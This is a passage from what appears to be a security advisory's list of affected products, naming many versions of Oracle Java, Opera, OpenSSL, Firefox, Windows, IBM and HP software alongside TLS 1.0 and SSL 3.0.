PeerSec Networks MatrixSSL 3.2.1
Oracle Solaris 11.1
Oracle Solaris 10
Oracle Oracle Fusion Middleware 11g Release 1 11.1.1 6
Oracle JRockit R28.1.4
Oracle JRockit R28.1.3
Oracle JRockit R28.1.1
Oracle JRockit R28.0.1
Oracle JRockit R28.0.0
Oracle JRockit R27.6.9
Oracle JRockit R27.6.8
Oracle JRockit R27.6.7
Oracle JRockit R27.6.6
Oracle JRockit R27.6.5
Oracle JRockit R27.6.4
Oracle JRockit R27.6.3
Oracle JRockit R27.6.2
Oracle JRockit R27.6.0-50 1.5.0 15
Oracle JRockit R27.6.0
Oracle JRockit R27.1.0
Oracle JRE (Windows Production Release) 1.6.0_27
Oracle JRE (Windows Production Release) 1.6.0_26
Oracle JRE (Windows Production Release) 1.6.0_25
Oracle JRE (Windows Production Release) 1.6.0_24
Oracle JRE (Windows Production Release) 1.6.0_23
Oracle JRE (Windows Production Release) 1.6.0_22
Oracle JRE (Solaris Production Release) 1.6.0_27
Oracle JRE (Solaris Production Release) 1.6.0_26
Oracle JRE (Solaris Production Release) 1.6.0_25
Oracle JRE (Solaris Production Release) 1.6.0_24
Oracle JRE (Solaris Production Release) 1.6.0_23
Oracle JRE (Solaris Production Release) 1.6.0_22
Oracle JRE (Linux Production Release) 1.6.0_27
Oracle JRE (Linux Production Release) 1.6.0_26
Oracle JRE (Linux Production Release) 1.6.0_25
Oracle JRE (Linux Production Release) 1.6.0_24
Oracle JRE (Linux Production Release) 1.6.0_23
Oracle JRE (Linux Production Release) 1.6.0_22
Oracle JDK (Windows Production Release) 1.7
Oracle JDK (Windows Production Release) 1.6.0_27
Oracle JDK (Windows Production Release) 1.6.0_26
Oracle JDK (Windows Production Release) 1.6.0_25
Oracle JDK (Windows Production Release) 1.6.0_24
Oracle JDK (Windows Production Release) 1.6.0_23
Oracle JDK (Windows Production Release) 1.6.0_22
Oracle JDK (Solaris Production Release) 1.7
Oracle JDK (Solaris Production Release) 1.6.0_27
Oracle JDK (Solaris Production Release) 1.6.0_26
Oracle JDK (Solaris Production Release) 1.6.0_25
Oracle JDK (Solaris Production Release) 1.6.0_24
Oracle JDK (Solaris Production Release) 1.6.0_23
Oracle JDK (Solaris Production Release) 1.6.0_22
Oracle JDK (Linux Production Release) 1.7
Oracle JDK (Linux Production Release) 1.6.0_27
Oracle JDK (Linux Production Release) 1.6.0_26
Oracle JDK (Linux Production Release) 1.6.0_25
Oracle JDK (Linux Production Release) 1.6.0_24
Oracle JDK (Linux Production Release) 1.6.0_23
Oracle JDK (Linux Production Release) 1.6.0_22
Oracle HTTP Server 12c 12.1.2
Oracle Fusion Middleware 11g Release 1 11.1.1 7
Oracle Fusion Middleware 12.1.3.0.0
Oracle Forms and Reports 11g Release 2 11.1.2.1
Oracle Enterprise Linux 6
Oracle Enterprise Linux 5
Oracle Database 11g Release 2 11.2.0.3
Oracle Database 11g Release 2 11.2.0.2
Oracle Database 11g Release 1 11.1.0.7
Opera Software Opera Web Browser 8.51
Opera Software Opera Web Browser 8.50
Opera Software Opera Web Browser 8.0.2
Opera Software Opera Web Browser 8.0 2
Opera Software Opera Web Browser 8.0 1
Opera Software Opera Web Browser 8.0
Opera Software Opera Web Browser 7.54
Opera Software Opera Web Browser 7.53
Opera Software Opera Web Browser 7.52
Opera Software Opera Web Browser 7.51
Opera Software Opera Web Browser 7.50
Opera Software Opera Web Browser 7.23
Opera Software Opera Web Browser 7.22
Opera Software Opera Web Browser 7.21
Opera Software Opera Web Browser 7.20 Beta 1 build 2981
Opera Software Opera Web Browser 7.20
Opera Software Opera Web Browser 7.11 j
Opera Software Opera Web Browser 7.11 b
Opera Software Opera Web Browser 7.11
Opera Software Opera Web Browser 7.10
Opera Software Opera Web Browser 7.0 win32 Beta 2
Opera Software Opera Web Browser 7.0 win32 Beta 1
Opera Software Opera Web Browser 7.0 win32
Opera Software Opera Web Browser 7.0 3win32
Opera Software Opera Web Browser 7.0 2win32
Opera Software Opera Web Browser 7.0 1win32
Opera Software Opera Web Browser 6.10 linux
Opera Software Opera Web Browser 6.0.5 win32
Opera Software Opera Web Browser 6.0.4 win32
Opera Software Opera Web Browser 6.0.3 win32
Opera Software Opera Web Browser 6.0.3 linux
Opera Software Opera Web Browser 6.0.2 win32
Opera Software Opera Web Browser 6.0.2 linux
Opera Software Opera Web Browser 6.0.1 win32
Opera Software Opera Web Browser 6.0.1 linux
Opera Software Opera Web Browser 6.0.1
Opera Software Opera Web Browser 6.0 win32
Opera Software Opera Web Browser 6.0 6
Opera Software Opera Web Browser 6.0 .6win32
Opera Software Opera Web Browser 6.0
Opera Software Opera Web Browser 5.12 win32
Opera Software Opera Web Browser 5.12
Opera Software Opera Web Browser 5.1 1 win32
Opera Software Opera Web Browser 5.1 0 win32
Opera Software Opera Web Browser 5.0 Linux
Opera Software Opera Web Browser 5.0 2 win32
Opera Software Opera Web Browser 5.0 Mac
Opera Software Opera Web Browser 9.64
Opera Software Opera Web Browser 9.63
Opera Software Opera Web Browser 9.62
Opera Software Opera Web Browser 9.61
Opera Software Opera Web Browser 9.60 beta 1
Opera Software Opera Web Browser 9.60
Opera Software Opera Web Browser 9.52
Opera Software Opera Web Browser 9.51
Opera Software Opera Web Browser 9.50 beta
Opera Software Opera Web Browser 9.5
Opera Software Opera Web Browser 9.27
Opera Software Opera Web Browser 9.26
Opera Software Opera Web Browser 9.25
Opera Software Opera Web Browser 9.24
Opera Software Opera Web Browser 9.23
Opera Software Opera Web Browser 9.22
Opera Software Opera Web Browser 9.21
Opera Software Opera Web Browser 9.20 beta 1
Opera Software Opera Web Browser 9.20
Opera Software Opera Web Browser 9.10
Opera Software Opera Web Browser 9.02
Opera Software Opera Web Browser 9.01
Opera Software Opera Web Browser 9
Opera Software Opera Web Browser 8.54
Opera Software Opera Web Browser 8.53
Opera Software Opera Web Browser 8.52
Opera Software Opera Web Browser 8 Beta 3
Opera Software Opera Web Browser 11.50
Opera Software Opera Web Browser 11.11
Opera Software Opera Web Browser 11.10
Opera Software Opera Web Browser 11.01
Opera Software Opera Web Browser 11.00
Opera Software Opera Web Browser 10.63
Opera Software Opera Web Browser 10.62
Opera Software Opera Web Browser 10.61
Opera Software Opera Web Browser 10.60 Beta1
Opera Software Opera Web Browser 10.60
Opera Software Opera Web Browser 10.60
Opera Software Opera Web Browser 10.54
Opera Software Opera Web Browser 10.54
Opera Software Opera Web Browser 10.53 B
Opera Software Opera Web Browser 10.53
Opera Software Opera Web Browser 10.52
Opera Software Opera Web Browser 10.51
Opera Software Opera Web Browser 10.50 Beta2
Opera Software Opera Web Browser 10.50 Beta1
Opera Software Opera Web Browser 10.50
Opera Software Opera Web Browser 10.10 Beta1
Opera Software Opera Web Browser 10.10
Opera Software Opera Web Browser 10.1
Opera Software Opera Web Browser 10.01
Opera Software Opera Web Browser 10.00 Beta3
Opera Software Opera Web Browser 10.00 Beta2
Opera Software Opera Web Browser 10.00 Beta1
Opera Software Opera Web Browser 10.00
Opera Software Opera Web Browser 10
OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0 beta3
OpenSSL Project OpenSSL 1.0 Beta2
OpenSSL Project OpenSSL 1.0 beta1
OpenSSL Project OpenSSL 1.0
OpenSSL Project OpenSSL 0.9.8 k
OpenSSL Project OpenSSL 0.9.8 j
OpenSSL Project OpenSSL 0.9.8 i
OpenSSL Project OpenSSL 0.9.8 h
OpenSSL Project OpenSSL 0.9.8 e
OpenSSL Project OpenSSL 0.9.8 d
OpenSSL Project OpenSSL 0.9.8 c
OpenSSL Project OpenSSL 0.9.8 b
OpenSSL Project OpenSSL 0.9.8 a
OpenSSL Project OpenSSL 0.9.8
OpenSSL Project OpenSSL 0.9.7 m
OpenSSL Project OpenSSL 0.9.7 l
OpenSSL Project OpenSSL 0.9.7 k
OpenSSL Project OpenSSL 0.9.7 j
OpenSSL Project OpenSSL 0.9.7 i
OpenSSL Project OpenSSL 0.9.7 h
OpenSSL Project OpenSSL 0.9.7 g
OpenSSL Project OpenSSL 0.9.7 f
OpenSSL Project OpenSSL 0.9.7 e
OpenSSL Project OpenSSL 0.9.7 d
OpenSSL Project OpenSSL 0.9.7 c
OpenSSL Project OpenSSL 0.9.7 beta3
OpenSSL Project OpenSSL 0.9.7 beta2
OpenSSL Project OpenSSL 0.9.7 beta1
OpenSSL Project OpenSSL 0.9.7 b
OpenSSL Project OpenSSL 0.9.7 a
OpenSSL Project OpenSSL 0.9.7
OpenSSL Project OpenSSL 0.9.6 m
OpenSSL Project OpenSSL 0.9.6 l
OpenSSL Project OpenSSL 0.9.6 k
OpenSSL Project OpenSSL 0.9.6 j
OpenSSL Project OpenSSL 0.9.6 i
OpenSSL Project OpenSSL 0.9.6 h
OpenSSL Project OpenSSL 0.9.6 g
OpenSSL Project OpenSSL 0.9.6 f
OpenSSL Project OpenSSL 0.9.6 e
OpenSSL Project OpenSSL 0.9.6 d
OpenSSL Project OpenSSL 0.9.6 c
OpenSSL Project OpenSSL 0.9.6 b-36.8
OpenSSL Project OpenSSL 0.9.6 b
OpenSSL Project OpenSSL 0.9.6 a
OpenSSL Project OpenSSL 0.9.6
OpenSSL Project OpenSSL 0.9.5 a
OpenSSL Project OpenSSL 0.9.5
OpenSSL Project OpenSSL 0.9.4
OpenSSL Project OpenSSL 0.9.3
OpenSSL Project OpenSSL 0.9.2 b
OpenSSL Project OpenSSL 0.9.1 c
OpenSSL Project OpenSSL 1.0.0e
OpenSSL Project OpenSSL 1.0.0d
OpenSSL Project OpenSSL 1.0.0c
OpenSSL Project OpenSSL 1.0.0b
OpenSSL Project OpenSSL 1.0.0b
OpenSSL Project OpenSSL 1.0.0A
OpenSSL Project OpenSSL 1.0.0a
OpenSSL Project OpenSSL 1.0.0 Beta5
OpenSSL Project OpenSSL 1.0.0 Beta4
OpenSSL Project OpenSSL 0.9.8s
OpenSSL Project OpenSSL 0.9.8R
OpenSSL Project OpenSSL 0.9.8Q
OpenSSL Project OpenSSL 0.9.8p
OpenSSL Project OpenSSL 0.9.8p
OpenSSL Project OpenSSL 0.9.8O
OpenSSL Project OpenSSL 0.9.8o
OpenSSL Project OpenSSL 0.9.8n
OpenSSL Project OpenSSL 0.9.8N
OpenSSL Project OpenSSL 0.9.8M
OpenSSL Project OpenSSL 0.9.8m
OpenSSL Project OpenSSL 0.9.8l
OpenSSL Project OpenSSL 0.9.8g
OpenSSL Project OpenSSL 0.9.8f
OpenSSL Project OpenSSL 0.9.8 f
OpenJDK OpenJDK 1.6
OpenJDK OpenJDK 6
Novell Access Manager 3.1 SP3
Novell Access Manager 3.1 SP2
Novell Access Manager 3.1 SP1
Novell Access Manager 3.1
Novell Access Manager 3.1
Mozilla Firefox 3.6.13
Mozilla Firefox 3.6.10
Mozilla Firefox 3.6.9
Mozilla Firefox 3.6.8
Mozilla Firefox 3.6.6
Mozilla Firefox 3.6.4
Mozilla Firefox 3.6.3
Mozilla Firefox 3.6.2
Mozilla Firefox 6
Mozilla Firefox 5.0
Mozilla Firefox 4.0.1
Mozilla Firefox 4.0 Beta1
Mozilla Firefox 4.0
Mozilla Firefox 3.6.7
Mozilla Firefox 3.6.6
Mozilla Firefox 3.6.20
Mozilla Firefox 3.6.19
Mozilla Firefox 3.6.18
Mozilla Firefox 3.6.17
Mozilla Firefox 3.6.16
Mozilla Firefox 3.6.15
Mozilla Firefox 3.6.14
Mozilla Firefox 3.6.12
Mozilla Firefox 3.6.11
Mozilla Firefox 3.6 Beta 3
Mozilla Firefox 3.6 Beta 2
Mozilla Firefox 3.6
Microsoft Windows XP Tablet PC Edition SP3
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Service Pack 3 0
Microsoft Windows XP Professional x64 Edition SP3
Microsoft Windows XP Professional x64 Edition SP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP3
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition 2005 SP3
Microsoft Windows XP Media Center Edition SP3
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP3
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Embedded SP3
Microsoft Windows XP Embedded SP2
Microsoft Windows XP 0
Microsoft Windows XP 0
Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition Sp2 X64
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition Sp1 X64
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista Business 64-bit edition X86-Ultimate
Microsoft Windows Vista Business 64-bit edition X86-Enterprise
Microsoft Windows Vista Business 64-bit edition X64-Ultimate
Microsoft Windows Vista Business 64-bit edition X64-Enterprise
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition Sp1 X86-Ultimate
Microsoft Windows Vista Business 64-bit edition Sp1 X86-Enterprise
Microsoft Windows Vista Business 64-bit edition Sp1 X64-Ultimate
Microsoft Windows Vista Business 64-bit edition Sp1 X64-Home Premium
Microsoft Windows Vista Business 64-bit edition Sp1 X64-Enterprise
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows Server 2008 Standard Edition X64
Microsoft Windows Server 2008 Standard Edition SP2
Microsoft Windows Server 2008 Standard Edition Release Candidate
Microsoft Windows Server 2008 Standard Edition R2 SP1
Microsoft Windows Server 2008 Standard Edition R2
Microsoft Windows Server 2008 Standard Edition Itanium
Microsoft Windows Server 2008 Standard Edition 0
Microsoft Windows Server 2008 Standard Edition - Sp2 Web
Microsoft Windows Server 2008 Standard Edition - Sp2 Storage
Microsoft Windows Server 2008 Standard Edition - Sp2 Hpc
Microsoft Windows Server 2008 Standard Edition - Gold Web
Microsoft Windows Server 2008 Standard Edition - Gold Storage
Microsoft Windows Server 2008 Standard Edition - Gold Standard
Microsoft Windows Server 2008 Standard Edition - Gold Itanium
Microsoft Windows Server 2008 Standard Edition - Gold Hpc
Microsoft Windows Server 2008 Standard Edition - Gold Enterprise
Microsoft Windows Server 2008 Standard Edition - Gold Datacenter
Microsoft Windows Server 2008 Standard Edition - Gold
Microsoft Windows Server 2008 R2 x64 SP1
Microsoft Windows Server 2008 R2 x64 0
Microsoft Windows Server 2008 R2 Standard Edition 0
Microsoft Windows Server 2008 R2 Itanium SP1
Microsoft Windows Server 2008 R2 Itanium 0
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 R2 Enterprise Edition 0
Microsoft Windows Server 2008 R2 Datacenter SP1
Microsoft Windows Server 2008 R2 Datacenter 0
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems R2
Microsoft Windows Server 2008 for x64-based Systems 0
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems R2
Microsoft Windows Server 2008 for Itanium-based Systems 0
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems 0
Microsoft Windows Server 2008 Enterprise Edition SP2
Microsoft Windows Server 2008 Enterprise Edition Release Candidate
Microsoft Windows Server 2008 Enterprise Edition 0
Microsoft Windows Server 2008 Datacenter Edition SP2
Microsoft Windows Server 2008 Datacenter Edition Release Candidate
Microsoft Windows Server 2008 Datacenter Edition 0
Microsoft Windows Server 2008 SP2 Beta
Microsoft Windows Server 2008 R2 SP1
Microsoft Windows Server 2008 - Sp2 Enterprise X64
Microsoft Windows Server 2003 x64 SP2
Microsoft Windows Server 2003 x64 SP1
Microsoft Windows Server 2003 Web Edition SP2
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Terminal Services 0
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP2
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 R2 web Edition 0
Microsoft Windows Server 2003 R2 Standard Edition 0
Microsoft Windows Server 2003 R2 Enterprise Edition SP2 0
Microsoft Windows Server 2003 R2 Enterprise Edition SP1 0
Microsoft Windows Server 2003 R2 Enterprise Edition 0
Microsoft Windows Server 2003 R2 Datacenter Edition SP2 0
Microsoft Windows Server 2003 R2 Datacenter Edition SP1 0
Microsoft Windows Server 2003 R2 Datacenter Edition 0
Microsoft Windows Server 2003 Itanium SP2
Microsoft Windows Server 2003 Itanium SP1
Microsoft Windows Server 2003 Itanium 0
Microsoft Windows Server 2003 Enterprise x64 Edition SP2
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium Sp2 Itanium
Microsoft Windows Server 2003 Enterprise Edition Itanium SP2
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition SP2
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Sp2 X64
Microsoft Windows Server 2003 Sp2 Storage
Microsoft Windows Server 2003 Sp2 Enterprise
Microsoft Windows Server 2003 Sp2 Datacenter
Microsoft Windows Server 2003 Sp2 Compute Cluster
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 Sp1 X64
Microsoft Windows Server 2003 Sp1 Storage
Microsoft Windows Server 2003 SP1 Platform SDK
Microsoft Windows Server 2003 Sp1 Compute Cluster
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003 R2 X64-Standard
Microsoft Windows Server 2003 R2 X64-Enterprise
Microsoft Windows Server 2003 R2 X64-Datacenter
Microsoft Windows Server 2003 R2 X64
Microsoft Windows Server 2003 R2 Storage
Microsoft Windows Server 2003 R2 Standard
Microsoft Windows Server 2003 R2 Platfom SDK
Microsoft Windows Server 2003 R2 Enterprise
Microsoft Windows Server 2003 R2 Datacenter
Microsoft Windows Server 2003 R2 Compute Cluster
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003 Gold X64-Standard
Microsoft Windows Server 2003 Gold X64-Enterprise
Microsoft Windows Server 2003 Gold X64-Datacenter
Microsoft Windows Server 2003 Gold X64
Microsoft Windows Server 2003 Gold Storage
Microsoft Windows Server 2003 Gold Standard
Microsoft Windows Server 2003 Gold Itanium
Microsoft Windows Server 2003 Gold Enterprise
Microsoft Windows Server 2003 Gold Datacenter
Microsoft Windows Server 2003 Gold Compute Cluster
Microsoft Windows Server 2003 Gold
Microsoft Windows Server 2008 R2
Microsoft Windows 7 XP Mode 0
Microsoft Windows 7 Ultimate 0
Microsoft Windows 7 Starter 0
Microsoft Windows 7 Professional 0
Microsoft Windows 7 Home Premium 0
Microsoft Windows 7 Home Premium - Sp1 X64
Microsoft Windows 7 Home Premium - Sp1 X32
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems SP1
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 RC
Mandriva Linux Mandrake 2011 x86_64
Mandriva Linux Mandrake 2011
Mandriva Linux Mandrake 2010.1 x86_64
Mandriva Linux Mandrake 2010.1
Mandriva Business Server 1 X86 64
Mandriva Business Server 1
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
Kerio Kerio Control 7.1.0 Patch 1
Kerio Kerio Control 7.1.0
Kerio Kerio Connect 7.1.4 build 2985
IETF TLS 1.0
IETF Secure Sockets Layer (SSL) 3.0
IBM WebSphere Multichannel Bank Transformation Toolkit 8.1.0.2
IBM WebSphere Multichannel Bank Transformation Toolkit 8.1
IBM WebSphere Multichannel Bank Transformation Toolkit 8.0.1
IBM WebSphere Multichannel Bank Transformation Toolkit 8.0
IBM WebSphere DataPower SOA Appliance Firmware 4.0.2
IBM WebSphere DataPower SOA Appliance Firmware 4.0.1
IBM WebSphere DataPower SOA Appliance Firmware 3.8.2
IBM WebSphere DataPower SOA Appliance Firmware 3.8.1
IBM WebSphere DataPower SOA Appliance Firmware 4.0
IBM WebSphere DataPower SOA Appliance Firmware 3.8
IBM System x Integrated Management Module (IMM2) 2
IBM System Networking Ethernet Switch 0
IBM Rational Policy Tester 8.5.0.1
IBM Rational Policy Tester 8.5
IBM Rational Policy Tester 8.0
IBM Rational AppScan Standard 8.5.0.1
IBM Rational AppScan Standard 8.0.0.3
IBM Rational AppScan Standard 8.0.0
IBM Rational AppScan Standard 7.8
IBM Rational AppScan Enterprise 8.6
IBM Rational AppScan Enterprise 8.5.0.1
IBM Rational AppScan Enterprise 8.0.1.1
IBM Rational AppScan Enterprise 8.0.1
IBM Rational AppScan Enterprise 8.0.0.1
IBM Rational AppScan Enterprise 8.0.0
IBM Power Systems 773.10
IBM Power Systems 773.02
IBM Power Systems 773.00
IBM Power Systems 770.31
IBM Power Systems 770.22
IBM Power Systems 770.21
IBM Power Systems 770.20
IBM Power Systems 770.10
IBM Power Systems 770.00
IBM Power Systems 760.41
IBM Power Systems 760.40
IBM Power Systems 760.31
IBM Power Systems 760.30
IBM Power Systems 760.20
IBM Power Systems 760.11
IBM Power Systems 760.10
IBM Power Systems 760.00
IBM Power Systems 740.81
IBM Power Systems 740.80
IBM Power Systems 740.70
IBM Power Systems 740.61
IBM Power Systems 740.60
IBM Power Systems 740.52
IBM Power Systems 740.51
IBM Power Systems 740.50
IBM Power Systems 740.40
IBM Power Systems 740.21
IBM Power Systems 740.20
IBM Power Systems 740.16
IBM Power Systems 740.15
IBM Power Systems 740.10
IBM Power Systems 740.00
IBM Power Systems 730.91
IBM Power Systems 730.90
IBM Power Systems 730.80
IBM Power Systems 730.72
IBM Power Systems 730.71
IBM Power Systems 730.70
IBM Power Systems 730.61
IBM Power Systems 730.60
IBM Power Systems 730.51
IBM Power Systems 730.50
IBM Power Systems 730.46
IBM Power Systems 730.45
IBM Power Systems 730.40
IBM Power Systems 730.30
IBM Power Systems 730.20
IBM Power Systems 730.00
IBM Power Systems 350.D0
IBM Power Systems 350.C0
IBM Power Systems 350.B1
IBM Power Systems 350.B0
IBM Power Systems 350.A0
IBM Power Systems 350.90
IBM Power Systems 350.80
IBM Power Systems 350.70
IBM Power Systems 350.60
IBM Power Systems 350.50
IBM Power Systems 350.40
IBM Power Systems 350.30
IBM Power Systems 350.20
IBM Power Systems 350.10
IBM Power Systems 350.00
IBM OpenPages GRC Platform 5.5.3
IBM OpenPages GRC Platform 5.5.2
IBM OpenPages GRC Platform 5.5
IBM OpenPages GRC Platform 5.1
IBM OpenPages GRC Platform 5.0
IBM Lotus Domino 8.5.3
IBM Lotus Domino 8.5.2
IBM Lotus Domino 8.5.1
IBM Lotus Domino 8.5
IBM Lotus Domino 8.0
IBM Java SE 1.4.2
IBM Java SE 7.0
IBM Java SE 7
IBM Java SE 6.0.0 SR9-FP2
IBM Java SE 6.0.0 SR9
IBM Java SE 6.0 SR7
IBM Java SE 6.0 SR6
IBM Java SE 6.0 SR5
IBM Java SE 6.0
IBM Java SE 6 SR8 FP1
IBM Java SE 6
IBM Java SE 5.0.0 SR12
IBM Java SE 5.0.0 SR12
IBM Java SE 5.0 SR12-FP5
IBM Java SE 5.0 SR11 PF1
IBM Java SE 5.0 SR11
IBM Java SE 5.0 SR10
IBM Java SE 5.0
IBM Java SE 1.4.2 SR13-FP10
IBM Java SDK 1.4.2
IBM Java SDK 6
IBM JAVA IBM 31-bit SDK for z/OS 5.0
IBM Flex System Manager 0
IBM Flex System Integrated Management Module (IMM2) 2
IBM Flex System IMM2 2.00
IBM Flex System IMM2 1.00
IBM Flex System CMM 1.40.2Q
IBM Flex System CMM 1.00
IBM Flex System Chassis Management Module (CMM) 0
IBM BladeCenter Advanced Management Module (AMM) 0
HP System Management Homepage 7.2
HP System Management Homepage 7.1.2
HP System Management Homepage 7.1.1
HP System Management Homepage 6.0 .96
HP System Management Homepage 3.0.2 .77
HP System Management Homepage 3.0.1 .73
HP System Management Homepage 3.0 .68
HP System Management Homepage 3.0 .64
HP System Management Homepage 2.2.9 .1
HP System Management Homepage 2.2.8
HP System Management Homepage 2.2.6
HP System Management Homepage 2.1.15 210
HP System Management Homepage 2.1.12
HP System Management Homepage 2.1.11
HP System Management Homepage 2.1.10
HP System Management Homepage 2.1.9
HP System Management Homepage 2.1.8
HP System Management Homepage 2.1.7
HP System Management Homepage 2.1.6
HP System Management Homepage 2.1.5
HP System Management Homepage 2.1.4
HP System Management Homepage 2.1.3 .132
HP System Management Homepage 2.1.3
HP System Management Homepage 2.1.2
HP System Management Homepage 2.1.1
HP System Management Homepage 2.1
HP System Management Homepage 2.0.2
HP System Management Homepage 2.0.1
HP System Management Homepage 2.0
HP System Management Homepage 7.1
HP System Management Homepage 7.0
HP System Management Homepage 6.3
HP System Management Homepage 6.2.0-12
HP System Management Homepage 6.2
HP System Management Homepage 6.2
HP System Management Homepage 6.1.0.103
HP System Management Homepage 6.1.0.102
HP System Management Homepage 6.1.0-103
HP System Management Homepage 6.1
HP System Management Homepage 6.0.0.95
HP System Management Homepage 6.0.0-95
HP System Management Homepage 6.0
HP System Management Homepage 3.0.2.77 B
HP System Management Homepage 3.0.2-77
HP System Management Homepage 3.0.1-73
HP System Management Homepage 3.0.0-68
HP System Management Homepage 2.1.8.179
HP System Management Homepage 2.1.6.156
HP System Management Homepage 2.1.5.146 B
HP System Management Homepage 2.1.5.146
HP System Management Homepage 2.1.4.143
HP System Management Homepage 2.1.2.127
HP System Management Homepage 2.1.15-210
HP System Management Homepage 2.1.14.20
HP System Management Homepage 2.1.12.201
HP System Management Homepage 2.1.11.197 A
HP System Management Homepage 2.1.10.186 C
HP System Management Homepage 2.1.10.186 B
HP System Management Homepage 2.1.10.186
HP System Management Homepage 2.1.0.121
HP System Management Homepage 2.0.2.106
HP System Management Homepage 2.0.1.104
HP System Management Homepage 0
HP NonStop Server J6.0.14.01
HP NonStop Server J06.16
HP NonStop Server J06.15.01
HP NonStop Server J06.15
HP NonStop Server J06.14.02
HP NonStop Server J06.14
HP NonStop Server J06.13.01
HP NonStop Server J06.13
HP NonStop Server J06.12.00
HP NonStop Server J06.11.01
HP NonStop Server J06.11.00
HP NonStop Server J06.10.02
HP NonStop Server J06.10.01
HP NonStop Server J06.10.00
HP NonStop Server J06.09.04
HP NonStop Server J06.09.03
HP NonStop Server J06.09.02
HP NonStop Server J06.09.01
HP NonStop Server J06.09.00
HP NonStop Server J06.08.04
HP NonStop Server J06.08.03
HP NonStop Server J06.08.02
HP NonStop Server J06.08.01
HP NonStop Server J06.08.00
HP NonStop Server J06.07.02
HP NonStop Server J06.07.01
HP NonStop Server J06.07.00
HP NonStop Server J06.06.03
HP NonStop Server J06.06.02
HP NonStop Server J06.06.01
HP NonStop Server J06.06.00
HP NonStop Server J06.05.02
HP NonStop Server J06.05.01
HP NonStop Server J06.05.00
HP NonStop Server J06.04.02
HP NonStop Server J06.04.01
HP NonStop Server J06.04.00
HP NonStop Server H06.27
HP NonStop Server H06.26.01
HP NonStop Server H06.26
HP NonStop Server H06.25.01
HP NonStop Server H06.25
HP NonStop Server H06.24.01
HP NonStop Server H06.24
HP NonStop Server H06.23
HP NonStop Server H06.22.01
HP NonStop Server H06.22.00
HP NonStop Server H06.21.02
HP NonStop Server H06.21.01
HP NonStop Server H06.21.00
HP NonStop Server H06.20.03
HP NonStop Server H06.20.02
HP NonStop Server H06.20.01
HP NonStop Server H06.20.00
HP NonStop Server H06.19.03
HP NonStop Server H06.19.02
